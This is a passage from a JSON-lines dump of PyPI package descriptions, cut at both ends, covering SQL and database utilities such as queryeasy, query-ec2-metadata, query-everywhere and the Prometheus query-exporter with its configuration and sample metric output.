\"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\\n', 'from_': 'FROM \"TABLE_A\"\\n', 'join': 'LEFT OUTER JOIN (\\n SELECT *\\n FROM \"TABLE_B\"\\n) AS 
\"TABLE_B\" ON (\\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\\n)\\n', 'where': 'WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \\n AND \"TABLE_A\".\"DATE_FIELD\" = \\'{YYYY-MM-DD}\\'\\n', 'group_by': '', 'order_by': '', 'having': '', 'window': '', 'extras': None, 'active': True}\nSELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\n , ((\"TABLE_A\".\"FILED_A\") || ( \"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\nFROM \"TABLE_A\"\nLEFT OUTER JOIN (\n SELECT *\n FROM \"TABLE_B\"\n) AS \"TABLE_B\" ON (\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\n)\nWHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \n AND \"TABLE_A\".\"DATE_FIELD\" = '{YYYY-MM-DD}'SET DATEimportdatetimedates=[datetime.date(2023,1,31)]sql=qd.set_date(sql,dates)print(sql)SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\n , ((\"TABLE_A\".\"FILED_A\") || ( \"TABLE_B\".\"FILED_B\")) AS \"FieldA+FieldB\"\nFROM \"TABLE_A\"\nLEFT OUTER JOIN (\n SELECT *\n FROM \"TABLE_B\"\n) AS \"TABLE_B\" ON (\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\n)\nWHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \n AND \"TABLE_A\".\"DATE_FIELD\" IN ('2023-01-31')"} +{"package": "query-domain-icp", "pacakge-description": "Python \u83b7\u53d6\u57df\u540d ICP \u5907\u6848\u4fe1\u606f \u81ea\u52a8\u7834\u89e3\u6ed1\u52a8\u9a8c\u8bc1\u7801 \u652f\u6301\u7ffb\u9875\u6570\u636e\u6765\u6e90\u5de5\u4fe1\u90e8\u5907\u6848\u7cfb\u7edfhttps://beian.miit.gov.cn/\u672c\u9879\u76ee\u4ec5\u4f9b\u5b66\u4e60\u4ea4\u6d41\u8bf7\u52ff\u7528\u4e8e\u975e\u6cd5\u7528\u9014"} +{"package": "queryeasy", "pacakge-description": "queryeasyExecute SQL queries on data present in CSV or Excel files. Also allows to generate the query output files.FeaturesQuery the CSV or Excel files using sql queriesProvides the option to store the query output to .xls, .xlsx, .csv formatsFormats the output to fit in the terminalRemoves the spaces from the column headers to ease query processSaves the output file to default dir if no path is specifiedInstallationYou can pip install the package usingpipinstallqueryeasyThe command line utility will be installed as\nqueryeasy to bin on Linux (e.g. /usr/bin); or as\nqueryeasy.exe to Scripts in your Python installation on Windows\n(e.g. 
C:\\Python3\\Scripts\\tabulate.exe).After installing, check the versionqueryeasy--versionUsagequeryeasy [-h] [-s sheet_name] [-o output_file] [-v] filename sql_queryIt can be used to execute sql queries on csv filequeryeasysample.csv\"select * from sample\"It can be used to execute sql queries on excel filequeryeasysample.xls\"select * from sample\"-sSheet1\nqueryeasysample.xlsx\"select * from sample\"-sSheet3The output of the performed query can be saved to a csv or excel filequeryeasysample.xls\"select * from sample\"-sSheet1-o/path/output.xls\nqueryeasysample.xlsx\"select * from sample\"-sSheet3-o/path/output.xlsx\nqueryeasysample.xlsx\"select * from sample\"-sSheet3-ooutput.xlsx\nqueryeasysample.csv\"select * from sample\"-sSheet3-o/path/output.csv\nqueryeasysample.csv\"select * from sample\"-sSheet3-ooutputArgumentspositional arguments: \n filename Enter the file path/name\n sql_query Enter the SQL query\n\noptional arguments:\n -h, --help show this help message and exit\n -s sheet_name, --sheet sheet_name\n Provide the sheet name for excel file\n -o output_file, --output output_file\n Output file path/name to store results\n -v, --version show program's version number and exitNotesTable names used in the SQL query should match the input CSV/Excel file names,\nwithout the \".csv\" or \".xls\" extensionWhile entering query, replace the spaces in column names with underscore(_)The default output file extension is .csvThe output file supports \".xlsx\", \".xls\", \".csv\" extensions as of nowContributeThe library is in initial stage and requires a lot of work, please feel free to contribute"} +{"package": "query-ec2-metadata", "pacakge-description": "EC2 Instance MetadataThis allows querying EC2 instance metadata.It uses IMDSv2. Session credentials are NOT available using this.InstallationAvailable on Pypi asquery-ec2-metadatapip install query-ec2-metadataCommand line toolsec2-metadataUsage:ec2-metadata KEYThis returns an attribute from the instance metadata.The KEY can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.htmlinstance-identityUsage:instance-identity KEYThis returns an attribute from the instance identity document.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.htmlPython moduleinstance_identity_document() -> Dict[str, str]:This returns the identity document for the instance.instance_identity(key: str) -> str:This returns an attribute from the instance identity document.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.htmlec2_metadata(key: str) -> str:This returns an attribute from the instance metadata.The key can be any of the data values fromhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.htmlDevelopmentmake initto set things upmake pytestto run unit testsmake testto run all testsRemember to bump the version inpyproject.tomlbefore merging."} +{"package": "query-everywhere", "pacakge-description": "Query Everywherequery your data in every RDBMS.Installpipinstallquery-everywhereNoticesYou should install your db driver(likepsycopg2-binary) before use.Examplefromquery_everywhereimportQueryer# Create a Queryer with DSNdsn=\"sqlite:///db.sqlite3\"queryer=Queryer(dsn)# Queryfilters=[(\"name__contains\",\"part of 
name\"),(\"age__gte\",20),(\"age__lt\",30),(\"address__neq\",\"beijing\"),(\"address__eq\",\"shanghai\"),(\"address__icontains\",\"beijing\"),]order=\"create_time desc\"limit=10offset=0data=queryer.query(\"people\",filters,order,limit,offset)print(data)# It where do# SELECT * FROM \"people\" WHERE name LIKE ? AND age >= ? AND age < ?# AND address != ? AND address = ? AND LOWER(address) LIKE ? ORDER BY ? LIMIT ? OFFSET ?Supported operatorsOperatorCommenteqequal toneqnot equal tonenot equal toltless thangtgreater thanlteless than or equal togtegreater than or equal tostartswithstarts with the given valueendswithends with the given valuecontainscontains the given valueicontainscontains the given value in the case-insensitive wayisnullis null"} +{"package": "query-exporter", "pacakge-description": "Export Prometheus metrics from SQL queriesquery-exporteris aPrometheusexporter which allows collecting metrics\nfrom database queries, at specified time intervals.It usesSQLAlchemyto connect to different database engines, including\nPostgreSQL, MySQL, Oracle and Microsoft SQL Server.Each query can be run on multiple databases, and update multiple metrics.The application is simply run as:query-exporter config.yamlwhere the passed configuration file contains the definitions of the databases\nto connect and queries to perform to update metrics.Configuration file formatA sample configuration file for the application looks like this:databases:db1:dsn:sqlite://connect-sql:-PRAGMA application_id = 123-PRAGMA auto_vacuum = 1labels:region:us1app:app1db2:dsn:sqlite://keep-connected:falselabels:region:us2app:app1metrics:metric1:type:gaugedescription:A sample gaugemetric2:type:summarydescription:A sample summarylabels:[l1,l2]expiration:24hmetric3:type:histogramdescription:A sample histogrambuckets:[10,20,50,100,1000]metric4:type:enumdescription:A sample enumstates:[foo,bar,baz]queries:query1:interval:5databases:[db1]metrics:[metric1]sql:SELECT random() / 1000000000000000 AS metric1query2:interval:20timeout:0.5databases:[db1,db2]metrics:[metric2,metric3]sql:|SELECT abs(random() / 1000000000000000) AS metric2,abs(random() / 10000000000000000) AS metric3,\"value1\" AS l1,\"value2\" AS l2query3:schedule:\"*/5****\"databases:[db2]metrics:[metric4]sql:|SELECT value FROM (SELECT \"foo\" AS metric4 UNIONSELECT \"bar\" AS metric3 UNIONSELECT \"baz\" AS metric4)ORDER BY random()LIMIT 1databasessectionThis section contains definitions for databases to connect to. 
Key names are\narbitrary and only used to reference databases in thequeriessection.Each database definitions can have the following keys:dsn:database connection details.It can be provided as a string in the following format:dialect[+driver]://[username:password][@host:port]/database[?option=value&...](seeSQLAlchemy documentationfor details on available engines and\noptions), or as key/value pairs:dialect:[+driver]user:password:host:port:database:options:::All entries are optional, exceptdialect.Note that in the string form, username, password and options need to be\nURL-encoded, whereas this is done automatically for the key/value form.Seedatabase-specific optionspage for some extra details on database\nconfiguration options.It\u2019s also possible to get the connection string indirectly from other sources:from an environment variable (e.g.$CONNECTION_STRING) by settingdsnto:env:CONNECTION_STRINGfrom a file, containing only the DSN value, by settingdsnto:file:/path/to/fileThese forms only support specifying the actual DNS in the string form.connect-sql:An optional list of queries to run right after database connection. This can\nbe used to set up connection-wise parameters and configurations.keep-connected:whether to keep the connection open for the database between queries, or\ndisconnect after each one. If not specified, defaults totrue. Setting\nthis option tofalsemight be useful if queries on a database are run\nwith very long interval, to avoid holding idle connections.autocommit:whether to set autocommit for the database connection. If not specified,\ndefaults totrue. This should only be changed tofalseif specific\nqueries require it.labels:an optional mapping of label names and values to tag metrics collected from each database.\nWhen labels are used, all databases must define the same set of labels.metricssectionThis section containsPrometheusmetrics definitions. Keys are used as metric\nnames, and must therefore be valid metric identifiers.Each metric definition can have the following keys:type:the type of the metric, must be specified. The following metric types are\nsupported:counter: value is incremented with each result from queriesenum: value is set with each result from queriesgauge: value is set with each result from querieshistogram: each result from queries is added to observationssummary: each result from queries is added to observationsdescription:an optional description of the metric.labels:an optional list of label names to apply to the metric.If specified, queries updating the metric must return rows that include\nvalues for each label in addition to the metric value. Column names must\nmatch metric and labels names.buckets:forhistogrammetrics, a list of buckets for the metrics.If not specified, default buckets are applied.states:forenummetrics, a list of string values for possible states.Queries for updating the enum must return valid states.expiration:the amount of time after which a series for the metric is cleared if no new\nvalue is collected.Last report times are tracked independently for each set of label values for\nthe metric.This can be useful for metric series that only last for a certain amount of\ntime, to avoid an ever-increasing collection of series.The value is interpreted as seconds if no suffix is specified; valid suffixes\nares,m,h,d. Only integer values are accepted.increment:forcountermetrics, whether to increment the value by the query result,\nor set the value to it.By default, counters are incremented by the value returned by the query. 
If\nthis is set tofalse, instead, the metric value will be set to the result\nof the query.NOTE: The default will be reversed in the 3.0 release, andincrementwill be set tofalseby default.queriessectionThis section contains definitions for queries to perform. Key names are\narbitrary and only used to identify queries in logs.Each query definition can have the following keys:databases:the list of databases to run the query on.Names must match those defined in thedatabasessection.Metrics are automatically tagged with thedatabaselabel so that\nindependent series are generated for each database that a query is run on.interval:the time interval at which the query is run.The value is interpreted as seconds if no suffix is specified; valid suffixes\nares,m,h,d. Only integer values are accepted.If a value is specified forinterval, aschedulecan\u2019t be specified.If no value is specified (or specified asnull), the query is only\nexecuted upon HTTP requests.metrics:the list of metrics that the query updates.Names must match those defined in themetricssection.parameters:an optional list or dictionary of parameters sets to run the query with.If specified as a list, the query will be run once for every set of\nparameters specified in this list, for every interval.Each parameter set must be a dictionary where keys must match parameters\nnames from the query SQL (e.g.:param).As an example:query:databases:[db]metrics:[metric]sql:|SELECT COUNT(*) AS metric FROM tableWHERE id > :param1 AND id < :param2parameters:-param1:10param2:20-param1:30param2:40If specified as a dictionary, it\u2019s used as a multidimensional matrix of\nparameters lists to run the query with.\nThe query will be run once for each permutation of parameters.If a query is specified with parameters as matrix in itssql, it will be run once\nfor every permutation in matrix of parameters, for every interval.Variable format in sql query::{top_level_key}__{inner_key}query:databases:[db]metrics:[apps_count]sql:|SELECT COUNT(1) AS apps_count FROM apps_listWHERE os = :os__name AND arch = :os__arch AND lang = :lang__nameparameters:os:-name:MacOSarch:arm64-name:Linuxarch:amd64-name:Windowsarch:amd64lang:-name:Python3-name:Java-name:TypeScriptThis example will generate 9 queries with all permutations ofosandlangparameters.schedule:a schedule for executing queries at specific times.This is expressed as a Cron-like format string (e.g.*/5 * * * *to run\nevery five minutes).If a value is specified forschedule, anintervalcan\u2019t be specified.If no value is specified (or specified asnull), the query is only\nexecuted upon HTTP requests.sql:the SQL text of the query.The query must return columns with names that match those of the metrics\ndefined inmetrics, plus those of labels (if any) for all these metrics.query:databases:[db]metrics:[metric1,metric2]sql:SELECT 10.0 AS metric1, 20.0 AS metric2will updatemetric1to10.0andmetric2to20.0.Note:since:is used for parameter markers (seeparametersabove),\nliteral single:at the beginning of a word must be escaped with\nbackslash (e.g.SELECT'\\:bar'FROM table). There\u2019s no need to escape\nwhen the colon occurs inside a word (e.g.SELECT 'foo:bar' FROM table).timeout:a value in seconds after which the query is timed out.If specified, it must be a multiple of 0.1.Metrics endpointThe exporter listens on port9560providing the standard/metricsendpoint.By default, the port is bound onlocalhost. 
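As a quick check (a sketch, assuming the exporter is running with the default settings described here), the endpoint can be fetched with any HTTP client, for example:curl http://localhost:9560/metrics   # default bind address and port per the paragraph above\n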
Note that if the name resolves\nboth IPv4 and IPv6 addressses, the exporter will bind on both.For the configuration above, the endpoint would return something like this:# HELP database_errors_total Number of database errors\n# TYPE database_errors_total counter\n# HELP queries_total Number of database queries\n# TYPE queries_total counter\nqueries_total{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\",status=\"success\"} 50.0\nqueries_total{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\",status=\"success\"} 13.0\nqueries_total{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\",status=\"success\"} 13.0\nqueries_total{app=\"app1\",database=\"db2\",query=\"query3\",region=\"us2\",status=\"error\"} 1.0\n# HELP queries_created Number of database queries\n# TYPE queries_created gauge\nqueries_created{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\",status=\"success\"} 1.5945442444463024e+09\nqueries_created{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\",status=\"success\"} 1.5945442444471517e+09\nqueries_created{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\",status=\"success\"} 1.5945442444477117e+09\nqueries_created{app=\"app1\",database=\"db2\",query=\"query3\",region=\"us2\",status=\"error\"} 1.5945444000140696e+09\n# HELP query_latency Query execution latency\n# TYPE query_latency histogram\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.005\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.01\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.025\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.05\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.075\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.1\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.25\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.75\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"1.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"2.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"5.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"7.5\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_count{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 50.0\nquery_latency_sum{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 0.004666365042794496\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.005\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.01\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.025\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.05\",query=\"query2\",region=\"us2\"} 
13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.075\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.1\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.25\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"0.75\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"1.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"2.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"5.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"7.5\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"10.0\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db2\",le=\"+Inf\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_count{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 13.0\nquery_latency_sum{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 0.012369773990940303\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.005\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.01\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.025\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.05\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.075\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.1\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.25\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"0.75\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"1.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"2.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"5.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"7.5\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_count{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 13.0\nquery_latency_sum{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 0.004745393933262676\n# HELP query_latency_created Query execution latency\n# TYPE query_latency_created gauge\nquery_latency_created{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 1.594544244446163e+09\nquery_latency_created{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 1.5945442444470239e+09\nquery_latency_created{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 1.594544244447551e+09\n# HELP query_timestamp Query last execution timestamp\n# TYPE query_timestamp 
gauge\nquery_timestamp{app=\"app1\",database=\"db2\",query=\"query2\",region=\"us2\"} 1.594544244446199e+09\nquery_timestamp{app=\"app1\",database=\"db1\",query=\"query1\",region=\"us1\"} 1.594544244452181e+09\nquery_timestamp{app=\"app1\",database=\"db1\",query=\"query2\",region=\"us1\"} 1.594544244481839e+09\n# HELP metric1 A sample gauge\n# TYPE metric1 gauge\nmetric1{app=\"app1\",database=\"db1\",region=\"us1\"} -3561.0\n# HELP metric2 A sample summary\n# TYPE metric2 summary\nmetric2_count{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 13.0\nmetric2_sum{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 58504.0\nmetric2_count{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 13.0\nmetric2_sum{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 75262.0\n# HELP metric2_created A sample summary\n# TYPE metric2_created gauge\nmetric2_created{app=\"app1\",database=\"db2\",l1=\"value1\",l2=\"value2\",region=\"us2\"} 1.594544244446819e+09\nmetric2_created{app=\"app1\",database=\"db1\",l1=\"value1\",l2=\"value2\",region=\"us1\"} 1.594544244447339e+09\n# HELP metric3 A sample histogram\n# TYPE metric3 histogram\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"10.0\",region=\"us2\"} 1.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"20.0\",region=\"us2\"} 1.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"50.0\",region=\"us2\"} 2.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"100.0\",region=\"us2\"} 3.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"1000.0\",region=\"us2\"} 13.0\nmetric3_bucket{app=\"app1\",database=\"db2\",le=\"+Inf\",region=\"us2\"} 13.0\nmetric3_count{app=\"app1\",database=\"db2\",region=\"us2\"} 13.0\nmetric3_sum{app=\"app1\",database=\"db2\",region=\"us2\"} 5016.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"10.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"20.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"50.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"100.0\",region=\"us1\"} 0.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"1000.0\",region=\"us1\"} 13.0\nmetric3_bucket{app=\"app1\",database=\"db1\",le=\"+Inf\",region=\"us1\"} 13.0\nmetric3_count{app=\"app1\",database=\"db1\",region=\"us1\"} 13.0\nmetric3_sum{app=\"app1\",database=\"db1\",region=\"us1\"} 5358.0\n# HELP metric3_created A sample histogram\n# TYPE metric3_created gauge\nmetric3_created{app=\"app1\",database=\"db2\",region=\"us2\"} 1.5945442444469101e+09\nmetric3_created{app=\"app1\",database=\"db1\",region=\"us1\"} 1.5945442444474254e+09\n# HELP metric4 A sample enum\n# TYPE metric4 gauge\nmetric4{app=\"app1\",database=\"db2\",metric4=\"foo\",region=\"us2\"} 0.0\nmetric4{app=\"app1\",database=\"db2\",metric4=\"bar\",region=\"us2\"} 0.0\nmetric4{app=\"app1\",database=\"db2\",metric4=\"baz\",region=\"us2\"} 1.0Builtin metricsThe exporter provides a few builtin metrics which can be useful to track query execution:database_errors{database=\"db\"}:a counter used to report number of errors, per database.queries{database=\"db\",query=\"q\",status=\"[success|error|timeout]\"}:a counter with number of executed queries, per database, query and status.query_latency{database=\"db\",query=\"q\"}:a histogram with query latencies, per database and query.query_timestamp{database=\"db\",query=\"q\"}:a gauge with query last execution timestamps, per database and query.In addition, metrics for resources usage for the 
exporter process can be\nincluded by passing--process-statsin the command line.Debugging / LogsYou can enable extended logging using the-Lcommandline switch. Possible\nlog levels areCRITICAL,ERROR,WARNING,INFO,DEBUG.Database enginesSQLAlchemydoesn\u2019t depend on specific Python database modules at\ninstallation. This means additional modules might need to be installed for\nengines in use. These can be installed as follows:pip install SQLAlchemy[postgresql] SQLAlchemy[mysql] ...based on which database engines are needed.Seesupported databasesfor details.Install from Snapquery-exportercan be installed fromSnap Storeon systems where Snaps\nare supported, via:sudo snap install query-exporterThe snap provides both thequery-exportercommand and a daemon instance of\nthe command, managed via a Systemd service.To configure the daemon:create or edit/var/snap/query-exporter/current/config.yamlwith the\nconfigurationrunsudo snap restartquery-exporterThe snap has support for connecting the following databases:PostgreSQL (postgresql://)MySQL (mysql://)SQLite (sqlite://)Microsoft SQL Server (mssql://)IBM DB2 (db2://) on supported architectures (x86_64, ppc64le and\ns390x)Run in Dockerquery-exportercan be run insideDockercontainers, and is available from\ntheDocker Hub:docker run --rm -it -p 9560:9560/tcp -v \"$CONFIG_DIR:/config\" adonato/query-exporter:latestwhere$CONFIG_DIRis the absolute path of a directory containing aconfig.yamlfile, the configuration file to use. Alternatively, a volume\nname can be specified.A different ODBC driver version to use can be specified during image building,\nby passing--build-argODBC_bVERSION_NUMBER, e.g.:docker build . --build-arg ODBC_DRIVER_VERSION=17The image has support for connecting the following databases:PostgreSQL (postgresql://)MySQL (mysql://)SQLite (sqlite://)Microsoft SQL Server (mssql://)IBM DB2 (db2://)Oracle (oracle://)ClickHouse (clickhouse+native://)AHelm chartto run the container in Kubernetes is also available."} +{"package": "query-exporter-carto", "pacakge-description": "query-exporteris aPrometheusexporter which allows collecting metrics\nfrom database queries, at specified time intervals.It usesSQLAlchemyto connect to different database engines, including\nPostgreSQL, MySQL, Oracle and Microsoft SQL Server.Each query can be run on multiple databases, and update multiple metrics.The application is called with a configuration file that looks like this:databases:db1:dsn:sqlite://db2:dsn:sqlite://metrics:metric1:type:gaugedescription:A sample gaugemetric2:type:summarydescription:A sample summarymetric3:type:histogramdescription:A sample histogrambuckets:[10,20,50,100,1000]metric4:type:enumdescription:A sample enumstates:[foo,bar,baz]queries:query1:interval:5databases:[db1]metrics:[metric1]sql:SELECT random() / 1000000000000000query2:interval:20databases:[db1,db2]metrics:[metric2,metric3]sql:|SELECT abs(random() / 1000000000000000),abs(random() / 10000000000000000)query3:interval:10databases:[db2]metrics:[metric4]sql:|SELECT value FROM (SELECT 'foo' AS value UNIONSELECT 'bar'UNION SELECT 'baz')ORDER BY random()LIMIT 1Thedsnconnection string has the following format:dialect[+driver]://[username:password][@host:port]/database(seeSQLAlchemy documentationfor details on the available options).Themetricslist in the query configuration must match values returned by\nthe query defined insql.Theintervalvalue is interpreted as seconds if no suffix is specified;\nvalid suffix ares,m,h,d. Only integer values can be\nspecified. 
If no value is specified (or specified asnull), the query is\nexecuted at every HTTP request.Queries will usually return a single row, but multiple rows are supported, and\neach row will cause an update of the related metrics. This is relevant for any\nkind of metric except gauges, which will be effectively updated to the value\nfrom the last row.For the configuration above, exported metrics look like this:# HELP metric1 A sample gauge\n# TYPE metric1 gauge\nmetric1{database=\"db1\"} 1549.0\n# HELP metric2 A sample summary\n# TYPE metric2 summary\nmetric2_count{database=\"db2\"} 1.0\nmetric2_sum{database=\"db2\"} 5229.0\nmetric2_count{database=\"db1\"} 1.0\nmetric2_sum{database=\"db1\"} 4513.0\n# TYPE metric2_created gauge\nmetric2_created{database=\"db2\"} 1.5456472955657206e+09\nmetric2_created{database=\"db1\"} 1.5456472955663064e+09\n# HELP metric3 A sample histogram\n# TYPE metric3 histogram\nmetric3_bucket{database=\"db2\",le=\"10.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"20.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"50.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"100.0\"} 0.0\nmetric3_bucket{database=\"db2\",le=\"1000.0\"} 1.0\nmetric3_bucket{database=\"db2\",le=\"+Inf\"} 1.0\nmetric3_count{database=\"db2\"} 1.0\nmetric3_sum{database=\"db2\"} 714.0\nmetric3_bucket{database=\"db1\",le=\"10.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"20.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"50.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"100.0\"} 0.0\nmetric3_bucket{database=\"db1\",le=\"1000.0\"} 1.0\nmetric3_bucket{database=\"db1\",le=\"+Inf\"} 1.0\nmetric3_count{database=\"db1\"} 1.0\nmetric3_sum{database=\"db1\"} 602.0\n# TYPE metric3_created gauge\nmetric3_created{database=\"db2\"} 1.545647295565831e+09\nmetric3_created{database=\"db1\"} 1.5456472955663848e+09\n# HELP metric4 A sample enum\n# TYPE metric4 gauge\nmetric4{database=\"db2\",metric4=\"foo\"} 0.0\nmetric4{database=\"db2\",metric4=\"bar\"} 1.0\nmetric4{database=\"db2\",metric4=\"baz\"} 0.0Metrics are automatically tagged with thedatabaselabel so that\nindipendent series are generated for each database.Database enginesSQLAlchemy doesn\u2019t depend on specific Python database modules at\ninstallation. This means additional modules might need to be installed for\nengines in use, as follows:pip install SQLAlchemy[postgresql] SQLAlchemy[mysql] ...based on which databased is in use.Seesupported databasesfor details.Carto extensionYou 